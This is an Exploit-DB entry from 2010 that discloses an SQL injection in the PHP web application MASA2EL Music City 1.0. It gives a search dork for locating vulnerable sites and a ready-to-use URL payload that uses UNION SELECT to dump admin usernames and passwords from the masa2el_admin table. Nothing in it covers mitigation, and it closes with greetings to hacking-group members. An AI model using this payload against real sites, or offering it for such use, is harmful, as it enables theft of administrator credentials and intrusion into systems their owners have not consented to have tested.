MASA2EL Music City 1.0 - SQL Injection

EDB-ID:

11329


Author:

alnjm33

Type:

webapps


Platform:

PHP

Date:

2010-02-04


::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Exploit Title : MASA2EL Music City Remote Sql Injection Vulnerability
Author: alnjm33
Software Link: http://www.masa2el.com/index.php?go=dl&type=d&id=4
Tested on: Version 1.0
My home : Sec-war.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
==========================================Dork==========================================
                                 (Powered By : MASA2EL Music City 1.0 )
================================Exploit=============================================
http://server/path/index.php?go=singer&id=-13/**/union/**/select/**/1,concat(UserName,0x3a,PasSword),3,4/**/from/**/masa2el_admin--

=======================================================================================
Greetz to : First to The Best Team In Africa( Egypt Football TEAM ) PrEdAtOr -Sh0ot3R - xXx - Mu$L!m-h4ck3r - ahmadso - JaMbA - RoOt_EgY- jago-dz - XR57 all Sec-War.com members